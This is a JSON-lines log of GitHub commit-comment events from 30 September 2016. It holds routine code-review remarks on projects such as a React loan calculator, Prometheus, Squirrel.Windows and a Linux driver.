{"id":"4643577924","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241293,"position":1,"line":1,"path":"frontend/views/modules/live-conference/browser-error-dialog.jade","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:55:42Z","updated_at":"2016-09-30T13:55:42Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:55:42Z"}
{"id":"4643578158","type":"CommitCommentEvent","actor":{"login":"btcdrak"},"repo":{"name":"jl2012/bips"},"payload":{"comment":{"id":19241294,"position":12,"line":12,"path":"bip-sighash.mediawiki","commit_id":"021d25bd6b36d7033ac10c7e43adc94b3c0c271f","created_at":"2016-09-30T13:55:44Z","updated_at":"2016-09-30T13:55:44Z","body":"s/operation/operations/"}},"created_at":"2016-09-30T13:55:44Z"}
{"id":"4643578850","type":"CommitCommentEvent","actor":{"login":"mherger"},"repo":{"name":"Logitech/slimserver"},"payload":{"comment":{"id":19241297,"position":null,"line":null,"path":null,"commit_id":"048572521ba0c9af6924d4ed1790ecfc3fc1bbe0","created_at":"2016-09-30T13:55:51Z","updated_at":"2016-09-30T13:55:51Z","body":"Oops... thanks for the heads up! Fixed in commit c835a1f28c69dd94ad7e4310ed390825c4b7bf27."}},"created_at":"2016-09-30T13:55:51Z"}
{"id":"4643579388","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241300,"position":57,"line":57,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:55:57Z","updated_at":"2016-09-30T13:55:57Z","body":"those default values should be set from constraints"}},"created_at":"2016-09-30T13:55:57Z"}
{"id":"4643579554","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241303,"position":1,"line":1,"path":"hublin","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:55:59Z","updated_at":"2016-09-30T13:55:59Z","body":"c'est un dossier que j'ai supprimé !"}},"created_at":"2016-09-30T13:55:59Z"}
{"id":"4643581215","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241318,"position":4,"line":5,"path":"src/routes/index.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:56:17Z","updated_at":"2016-09-30T13:56:17Z","body":"sorting of imports"}},"created_at":"2016-09-30T13:56:17Z"}
{"id":"4643582397","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241323,"position":6,"line":6,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T13:56:29Z","updated_at":"2016-09-30T13:56:29Z","body":"eslint"}},"created_at":"2016-09-30T13:56:29Z"}
{"id":"4643587728","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241341,"position":22,"line":25,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T13:57:24Z","updated_at":"2016-09-30T13:57:24Z","body":"there should be `return null`"}},"created_at":"2016-09-30T13:57:24Z"}
{"id":"4643590148","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241352,"position":26,"line":29,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T13:57:50Z","updated_at":"2016-09-30T13:57:50Z","body":"why `let`, you are not mutating it so it should be `const`"}},"created_at":"2016-09-30T13:57:50Z"}
{"id":"4643593406","type":"CommitCommentEvent","actor":{"login":"georgebejan"},"repo":{"name":"OOP-30225/test-test-isaiabejan"},"payload":{"comment":{"id":19241362,"position":null,"line":null,"path":null,"commit_id":"1ac8cbe24649461735761039a106c3b575c30cd2","created_at":"2016-09-30T13:58:23Z","updated_at":"2016-09-30T13:58:23Z","body":"Testing"}},"created_at":"2016-09-30T13:58:23Z"}
{"id":"4643595281","type":"CommitCommentEvent","actor":{"login":"isaiabejan"},"repo":{"name":"OOP-30225/test-test-isaiabejan"},"payload":{"comment":{"id":19241368,"position":5,"line":7,"path":"about.md","commit_id":"1ac8cbe24649461735761039a106c3b575c30cd2","created_at":"2016-09-30T13:58:44Z","updated_at":"2016-09-30T13:58:44Z","body":"zczxcz"}},"created_at":"2016-09-30T13:58:44Z"}
{"id":"4643598217","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19241382,"position":null,"line":null,"path":null,"commit_id":"cce913b70fd8fcefa16eda090f6113656250202d","created_at":"2016-09-30T13:59:17Z","updated_at":"2016-09-30T13:59:17Z","body":"You should probably get #1024 in then. It should make a difference for renderers being strict about the standard."}},"created_at":"2016-09-30T13:59:17Z"}
{"id":"4643598250","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241383,"position":28,"line":31,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T13:59:17Z","updated_at":"2016-09-30T13:59:17Z","body":"value of amount/term should be stored in state, no logic in components!"}},"created_at":"2016-09-30T13:59:17Z"}
{"id":"4643599694","type":"CommitCommentEvent","actor":{"login":"Brandielli"},"repo":{"name":"Brandielli/Worktiv"},"payload":{"comment":{"id":19241390,"position":null,"line":null,"path":null,"commit_id":"13174f9c9e8fe95dd68fb076f0538e9ca97f4750","created_at":"2016-09-30T13:59:32Z","updated_at":"2016-09-30T13:59:32Z","body":"Default"}},"created_at":"2016-09-30T13:59:32Z"}
{"id":"4643601404","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241396,"position":28,"line":31,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T13:59:50Z","updated_at":"2016-09-30T13:59:50Z","body":"reducer should have take care of this"}},"created_at":"2016-09-30T13:59:50Z"}
{"id":"4643607511","type":"CommitCommentEvent","actor":{"login":"rachelglenn"},"repo":{"name":"rachelglenn/pythonpluginTDHF"},"payload":{"comment":{"id":19241405,"position":3,"line":8,"path":"H2+.dat","commit_id":"2e5e7f4e780aab9b9ae552052916272d88af2352","created_at":"2016-09-30T14:00:49Z","updated_at":"2016-09-30T14:00:49Z","body":"Please let me know if this looks okay\r\n"}},"created_at":"2016-09-30T14:00:49Z"}
{"id":"4643607550","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241406,"position":5,"line":5,"path":"src/routes/Calculator/components/CalculatorOffer.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:00:49Z","updated_at":"2016-09-30T14:00:49Z","body":"inline styles without using Radium are not good idea.."}},"created_at":"2016-09-30T14:00:49Z"}
{"id":"4643614830","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19241422,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T14:02:08Z","updated_at":"2016-09-30T14:02:08Z","body":"> As for SD, I'm not sure, but if you mean that SD is a second mechanism to configure multiple endpoints, then I would have naively assumed that each remote write config would have had its own SD config\r\n\r\nIt may eventually have SD, but by having only one endpoint we can defer requests for it by saying it's intended to point to a single static VIP. With multiple endpoints supported (and even putting it in the config file) that explanation doesn't work quite so well.\r\n\r\nIt's not a matter of not supporting things, but rather not supporting things a) before we have to and b) we're sure they're actually generally needed."}},"created_at":"2016-09-30T14:02:08Z"}
{"id":"4643615729","type":"CommitCommentEvent","actor":{"login":"rossi2000"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19241424,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-30T14:02:16Z","updated_at":"2016-09-30T14:02:16Z","body":"1.  impossible to be a copy of ATV,  i coded this myself with some assistance,  so maybe we have the same thing in mind.  (good minds think alike...  )\r\n\r\n2.  nothing has changed here, why were those streaming related options but in Customise in the first place???  i haven't adjusted any of that.\r\n\r\n3. great.\r\n\r\n\r\ni don't find it cluttered, but its hard to please some people anyway.\r\n\r\nAGAIN,  its a WIP, i'll probably make some more tweaks when i feel like adjusting some more,   this may not even make it into vix,   only on my box."}},"created_at":"2016-09-30T14:02:16Z"}
{"id":"4643617954","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241429,"position":68,"line":63,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:02:40Z","updated_at":"2016-09-30T14:02:40Z","body":"why to have 2 callbacks on change?"}},"created_at":"2016-09-30T14:02:40Z"}
{"id":"4643622043","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241433,"position":61,"line":67,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:03:21Z","updated_at":"2016-09-30T14:03:21Z","body":"duplication of logic to get values"}},"created_at":"2016-09-30T14:03:21Z"}
{"id":"4643622620","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19241434,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-30T14:03:28Z","updated_at":"2016-09-30T14:03:28Z","body":"I think I have an idea of what Express is doing now. It modified `request.url` so that you get the full host-relative URI from `request.baseUrl + request.url`. Which is behavior that makes a lot of sense now that I think about it. In the autoserve context, the most simple route to deploying an app to anywhere and with support for `baseUrl`, if you have anything like a routing system to match URI values to actions, you’d probably want to access `req.url` and assume that the values you see there are the same regardless of whether `baseUrl` is `'/'` (or `''`?) or `/some/mount/path`. I’m thinking about adopting that behavior. I think it might be in-scope with autoserve and it would probably make it compatible with other frameworks which use `baseUrl` at all, including Express."}},"created_at":"2016-09-30T14:03:28Z"}
{"id":"4643626062","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19241442,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T14:04:02Z","updated_at":"2016-09-30T14:04:02Z","body":"I dont think jagged stuff will happen after lpf.\nJagger parts are only on edges what get smoothed with lpf.\n\nThe old code with debugging was very confusing and not nice.\n\nI also noticed that notch filters dont introduce any significant delay at\nall to usefull frequencies.\nI am now also running experimental double notch on gyro and it seems fine.\n"}},"created_at":"2016-09-30T14:04:02Z"}
{"id":"4643629306","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241447,"position":92,"line":98,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:04:36Z","updated_at":"2016-09-30T14:04:36Z","body":"should be const"}},"created_at":"2016-09-30T14:04:36Z"}
{"id":"4643632322","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19241450,"position":null,"line":null,"path":null,"commit_id":"2deea99cd7b87b082d1da8469d3ecc73346ae440","created_at":"2016-09-30T14:05:09Z","updated_at":"2016-09-30T14:05:09Z","body":"Maybe set which one is default in the description too (like this):\r\n```\r\n#        Default:     1 - (Enabled, Blizzlike)\r\n#                     0 - (Disabled)\r\n```"}},"created_at":"2016-09-30T14:05:09Z"}
{"id":"4643634200","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241454,"position":124,"line":128,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:05:32Z","updated_at":"2016-09-30T14:05:32Z","body":"you need to handle amount/term values here in receive intervals (you value or default value)"}},"created_at":"2016-09-30T14:05:32Z"}
{"id":"4643635834","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241459,"position":123,"line":127,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:05:49Z","updated_at":"2016-09-30T14:05:49Z","body":"same key `fetching` for both actions?"}},"created_at":"2016-09-30T14:05:49Z"}
{"id":"4643637218","type":"CommitCommentEvent","actor":{"login":"yueqin"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19241462,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T14:06:04Z","updated_at":"2016-09-30T14:06:04Z","body":"赞"}},"created_at":"2016-09-30T14:06:04Z"}
{"id":"4643639019","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241467,"position":69,"line":75,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"4f39773dac42f7e290ecc4976f8c17477324e062","created_at":"2016-09-30T14:06:25Z","updated_at":"2016-09-30T14:06:25Z","body":"what about errors?"}},"created_at":"2016-09-30T14:06:25Z"}
{"id":"4643639511","type":"CommitCommentEvent","actor":{"login":"amjames"},"repo":{"name":"rachelglenn/pythonpluginTDHF"},"payload":{"comment":{"id":19241468,"position":11,"line":12,"path":"H2+.dat","commit_id":"2e5e7f4e780aab9b9ae552052916272d88af2352","created_at":"2016-09-30T14:06:30Z","updated_at":"2016-09-30T14:06:30Z","body":"@rachelglenn this looks fine setting the charge should do the trick. \r\n\r\nFYI in Li's paper they say they used H-H distance of 1.0603 (Angstrom).  "}},"created_at":"2016-09-30T14:06:30Z"}
{"id":"4643645107","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241479,"position":7,"line":7,"path":"src/routes/Calculator/components/CalculatorOffer.js","commit_id":"8be9189935e83567cfac03acc0d0f1ac72b1691c","created_at":"2016-09-30T14:07:25Z","updated_at":"2016-09-30T14:07:25Z","body":"`height: 100` of? `px`, `em`, `rem`???"}},"created_at":"2016-09-30T14:07:25Z"}
{"id":"4643645467","type":"CommitCommentEvent","actor":{"login":"hphu"},"repo":{"name":"HPRC/Dominet"},"payload":{"comment":{"id":19241481,"position":21,"line":81,"path":"tests/game_tests.py","commit_id":"b2c29b5ee7702bbe2cd56c7589a41471c057915c","created_at":"2016-09-30T14:07:28Z","updated_at":"2016-09-30T14:07:28Z","body":"This doesnt test the durations get added back at the end\r\nAlso please don't push to master directly"}},"created_at":"2016-09-30T14:07:28Z"}
{"id":"4643646947","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241486,"position":15,"line":11,"path":"app/teamList/team/card/card.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:07:43Z","updated_at":"2016-09-30T14:07:43Z","body":"It is not a good practice to directly use ``$scope`` in the controller, better use ``this`` and controllerAs syntax"}},"created_at":"2016-09-30T14:07:43Z"}
{"id":"4643648743","type":"CommitCommentEvent","actor":{"login":"smoyen"},"repo":{"name":"jenkinsci/saml-plugin"},"payload":{"comment":{"id":19241490,"position":null,"line":null,"path":null,"commit_id":"cfbcc30987d7ad4066cc3fb3f7c89211752887e7","created_at":"2016-09-30T14:08:02Z","updated_at":"2016-09-30T14:08:02Z","body":"Looks like this change solves an open issue (https://issues.jenkins-ci.org/browse/JENKINS-37289). Is there any way we could get a new release with this addition?\r\n"}},"created_at":"2016-09-30T14:08:02Z"}
{"id":"4643649939","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241495,"position":10,"line":9,"path":"app/teamList/team/card/card.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:08:15Z","updated_at":"2016-09-30T14:08:15Z","body":"You should probably use directive ``compile`` directly."}},"created_at":"2016-09-30T14:08:15Z"}
{"id":"4643649997","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241497,"position":9,"line":9,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"ff1ccb676f08bd6dc0cfd0fcb91c3e73ac492fa2","created_at":"2016-09-30T14:08:15Z","updated_at":"2016-09-30T14:08:15Z","body":"This work is derived from the previous work of ccaione (https://patchwork.kernel.org/patch/7738781/), some part are just copy/paste, some are completely rewritten.\r\nShould I add the copyright of endless here ?"}},"created_at":"2016-09-30T14:08:15Z"}
{"id":"4643652079","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241505,"position":5,"line":73,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"8be9189935e83567cfac03acc0d0f1ac72b1691c","created_at":"2016-09-30T14:08:37Z","updated_at":"2016-09-30T14:08:37Z","body":"the issue is with concurrent requests and responses that can come to your application in different order than you send them."}},"created_at":"2016-09-30T14:08:37Z"}
{"id":"4643658812","type":"CommitCommentEvent","actor":{"login":"MalloZup"},"repo":{"name":"SUSE/spacewalk-testsuite-base"},"payload":{"comment":{"id":19241528,"position":5,"line":108,"path":"docs/SLEnkins-howto.md","commit_id":"b76b3ad57a7ee8d2cc02e6e732ae47ff5f8722ae","created_at":"2016-09-30T14:09:49Z","updated_at":"2016-09-30T14:09:49Z","body":"cool thx"}},"created_at":"2016-09-30T14:09:49Z"}
{"id":"4643659676","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241531,"position":107,"line":107,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"ff1ccb676f08bd6dc0cfd0fcb91c3e73ac492fa2","created_at":"2016-09-30T14:09:58Z","updated_at":"2016-09-30T14:09:58Z","body":"These data are not strictly necessary as the ip is 8 to 256 but since there should no IRQs mapped in the upper part, is seems better have to this.\r\nDo you agree ?"}},"created_at":"2016-09-30T14:09:58Z"}
{"id":"4643663431","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241537,"position":4,"line":3,"path":"app/teamList/team/card/card.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:10:39Z","updated_at":"2016-09-30T14:10:39Z","body":"Let's create a basic CardComponent and two its children CompactCardComponent and CardDetailsComponent (or any other names you'd like). Then you can leave the responsibility of choosing which card view template is needed to parent components like Backlog or CardView."}},"created_at":"2016-09-30T14:10:39Z"}
{"id":"4643666029","type":"CommitCommentEvent","actor":{"login":"AshMcConnell"},"repo":{"name":"xamelion/angular-slick"},"payload":{"comment":{"id":19241542,"position":null,"line":null,"path":null,"commit_id":"f1b74f6e0722e77302e213150fdb41362395c3db","created_at":"2016-09-30T14:11:07Z","updated_at":"2016-09-30T14:11:07Z","body":"Thanks, this helped me with an Angular 2 integration too."}},"created_at":"2016-09-30T14:11:07Z"}
{"id":"4643669327","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241550,"position":6,"line":49,"path":"app/teamList/team/statusField/statusField.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:11:43Z","updated_at":"2016-09-30T14:11:43Z","body":"Better not to leave console.logs in code unless you really need them (you won't most of the time). You can configure eslint to warn you about them."}},"created_at":"2016-09-30T14:11:43Z"}
{"id":"4643669339","type":"CommitCommentEvent","actor":{"login":"gtback"},"repo":{"name":"STIXProject/python-stix"},"payload":{"comment":{"id":19241551,"position":5,"line":169,"path":"stix/extensions/malware/maec_4_1_malware.py","commit_id":"c50ecc901aee5199fee97bad9b2a9ea436571cde","created_at":"2016-09-30T14:11:43Z","updated_at":"2016-09-30T14:11:43Z","body":"This will cause any parameter that gets passed in to be ignored. I don't think it will ever actually be an issue, since there aren't any subclasses of `MAECInstance`, but should we instead do:\r\n\r\n```\r\nsuper(MAECInstance, self).to_obj(return_obj=return_obk, ns_info=ns_info)\r\n```\r\n\r\n?"}},"created_at":"2016-09-30T14:11:43Z"}
{"id":"4643670660","type":"CommitCommentEvent","actor":{"login":"grandtiger"},"repo":{"name":"Squirrel/Squirrel.Windows"},"payload":{"comment":{"id":19241553,"position":null,"line":null,"path":null,"commit_id":"7b16d6d880ffb0736186bb6a5204926ea8adac09","created_at":"2016-09-30T14:11:56Z","updated_at":"2016-09-30T14:11:56Z","body":"Can we make the following change? If will solve a problem for my use case where the file is protected by active directory group. Passing the windows credentials will make it work. Is there any harm to always assign the Credentials for WebClient?\r\n\r\n```\r\npublic static WebClient CreateWebClient()\r\n        {\r\n            // WHY DOESNT IT JUST DO THISSSSSSSS\r\n            var ret = new WebClient();\r\n            var wp = WebRequest.DefaultWebProxy;\r\n            if (wp != null) {\r\n                wp.Credentials = CredentialCache.DefaultCredentials;\r\n                ret.Proxy = wp;\r\n            } else {\r\n                ret.Credentials = CredentialCache.DefaultCredentials;\r\n            }\r\n            return ret;\r\n        }\r\n```\r\n\r\nFollowing is a simple standalone program I used to replicate the issue and verified the solution.\r\n```\r\n    class Program\r\n    {\r\n        static void Main(string[] args)\r\n        {\r\n            try\r\n            {\r\n                var wp = WebRequest.DefaultWebProxy;\r\n                Console.WriteLine(wp); // this seems always true, how can I make it false?\r\n                WebClient webClient = new WebClient();\r\n                webClient.Credentials = CredentialCache.DefaultCredentials; // without this line, I'll always get an exception as shown below.\r\n                webClient.DownloadFile(new Uri(\"https://host/path/to/file.txt\"), \"file.txt\");\r\n            }\r\n            catch (Exception e)\r\n            {\r\n                Console.WriteLine(e);\r\n            }\r\n        }\r\n    }\r\n```\r\n\r\nException\r\n```\r\nSystem.Net.WebRequest+WebProxyWrapper\r\nSystem.Net.WebException: The remote server returned an error: (401) Unauthorized.\r\n   at System.Net.WebClient.DownloadFile(Uri address, String fileName)\r\n   at FileDownload.Program.Main(String[] args) in C:\\Projects\\FileDownload\\FileDownload\\FileDownload\\Program.cs:line 23\r\nPress any key to continue . . .\r\n```\r\n\r\n\r\n"}},"created_at":"2016-09-30T14:11:56Z"}
{"id":"4643670690","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"NixOS/nixos-weekly"},"payload":{"comment":{"id":19241554,"position":20,"line":14,"path":"posts/2016-09-12-everything-must-start-somewhere-1.md","commit_id":"493bc3bf2076c4af351dc06c11204da988778218","created_at":"2016-09-30T14:11:57Z","updated_at":"2016-09-30T14:11:57Z","body":"*Pletz"}},"created_at":"2016-09-30T14:11:57Z"}
{"id":"4643671195","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19241556,"position":null,"line":null,"path":null,"commit_id":"cfcfdb6d5c9eb0af8104fb3cb26d1a778b076724","created_at":"2016-09-30T14:12:02Z","updated_at":"2016-09-30T14:12:02Z","body":"Falto actualizar la linea 86 de extender-plantillas.rst \r\n\r\n-from django.conf.urls import include, url\r\n+from django.conf.urls import url"}},"created_at":"2016-09-30T14:12:02Z"}
{"id":"4643671267","type":"CommitCommentEvent","actor":{"login":"gtback"},"repo":{"name":"STIXProject/python-stix"},"payload":{"comment":{"id":19241557,"position":5,"line":169,"path":"stix/extensions/malware/maec_4_1_malware.py","commit_id":"c50ecc901aee5199fee97bad9b2a9ea436571cde","created_at":"2016-09-30T14:12:03Z","updated_at":"2016-09-30T14:12:03Z","body":"This will cause any parameter that gets passed in to be ignored. I don't think it will ever actually be an issue, since there aren't any subclasses of `MAECInstance`, but should we instead do:\r\n\r\n```\r\nsuper(MAECInstance, self).to_obj(return_obj=return_obk, ns_info=ns_info)\r\n```\r\n\r\n?"}},"created_at":"2016-09-30T14:12:03Z"}
{"id":"4643674295","type":"CommitCommentEvent","actor":{"login":"Reprazent"},"repo":{"name":"pjaspers/dotfiles"},"payload":{"comment":{"id":19241569,"position":null,"line":null,"path":null,"commit_id":"31bfa0dc7096b9c6ca389e3b55566b9b1d6b27a7","created_at":"2016-09-30T14:12:34Z","updated_at":"2016-09-30T14:12:34Z","body":"REACHING A WHOLE NEW LEVEL OF WEBSCALE!"}},"created_at":"2016-09-30T14:12:34Z"}
{"id":"4643674759","type":"CommitCommentEvent","actor":{"login":"BenFrankel"},"repo":{"name":"BenFrankel/CH-Analysis"},"payload":{"comment":{"id":19241570,"position":null,"line":null,"path":null,"commit_id":"14b3f8b16e8e2a803617cb7b43b0be96fd8f675c","created_at":"2016-09-30T14:12:39Z","updated_at":"2016-09-30T14:12:39Z","body":"For this one in particular I actually just used Microsoft Paint :)"}},"created_at":"2016-09-30T14:12:39Z"}
{"id":"4643675066","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241571,"position":4,"line":4,"path":"app/teamList/team/team.html","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:12:42Z","updated_at":"2016-09-30T14:12:42Z","body":"You have different naming convetions here: CamelCase and snake-case. Better use CamelCase for all js-related stuff and snake-case for css/html (like class names, ids etc.)"}},"created_at":"2016-09-30T14:12:42Z"}
{"id":"4643677253","type":"CommitCommentEvent","actor":{"login":"TheNeikos"},"repo":{"name":"matthiasbeyer/imag"},"payload":{"comment":{"id":19241574,"position":5,"line":670,"path":"libimagstore/src/store.rs","commit_id":"caa214f1bdcdf29f20bd818ed997b3f4eada64db","created_at":"2016-09-30T14:13:05Z","updated_at":"2016-09-30T14:13:05Z","body":"Yeah, since it might not be in the HashMap"}},"created_at":"2016-09-30T14:13:05Z"}
{"id":"4643679964","type":"CommitCommentEvent","actor":{"login":"YannBertrand"},"repo":{"name":"YannBertrand/YouWatch"},"payload":{"comment":{"id":19241584,"position":null,"line":null,"path":null,"commit_id":"1b65566ebd3f219ffc1d9998d73721612208fb5c","created_at":"2016-09-30T14:13:34Z","updated_at":"2016-09-30T14:13:34Z","body":"Best commit ever 💛💙💜❤️💚"}},"created_at":"2016-09-30T14:13:34Z"}
{"id":"4643682808","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241592,"position":11,"line":4,"path":"app/teamList/team/team.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:14:04Z","updated_at":"2016-09-30T14:14:04Z","body":"Does not seem like separate var is needed, you can use ``next.params.id`` directly in the next line"}},"created_at":"2016-09-30T14:14:04Z"}
{"id":"4643686315","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19241600,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T14:14:39Z","updated_at":"2016-09-30T14:14:39Z","body":"Ok, fair enough!"}},"created_at":"2016-09-30T14:14:39Z"}
{"id":"4643687514","type":"CommitCommentEvent","actor":{"login":"intellix"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":19241601,"position":1,"line":21,"path":"packages/angular-cli/blueprints/ng2/files/__path__/app/app.component.spec.ts","commit_id":"06976f4f07a6d6065124a819b95634bddaac4598","created_at":"2016-09-30T14:14:53Z","updated_at":"2016-09-30T14:14:53Z","body":"shouldn't this be changed as well?"}},"created_at":"2016-09-30T14:14:53Z"}
{"id":"4643690116","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241606,"position":7,"line":7,"path":"app/teamList/teamList.js","commit_id":"83101d15a1d83f257e831c79d08726d9150b591e","created_at":"2016-09-30T14:15:21Z","updated_at":"2016-09-30T14:15:21Z","body":"Components, classes and services are commonly named with capital letter"}},"created_at":"2016-09-30T14:15:21Z"}
{"id":"4643692454","type":"CommitCommentEvent","actor":{"login":"Yieron"},"repo":{"name":"Yieron/Android_summary"},"payload":{"comment":{"id":19241612,"position":null,"line":null,"path":null,"commit_id":"d3016b02c92f3240b5ebe67902f4511db9711579","created_at":"2016-09-30T14:15:45Z","updated_at":"2016-09-30T14:15:45Z","body":"安卓底层相关知识"}},"created_at":"2016-09-30T14:15:45Z"}
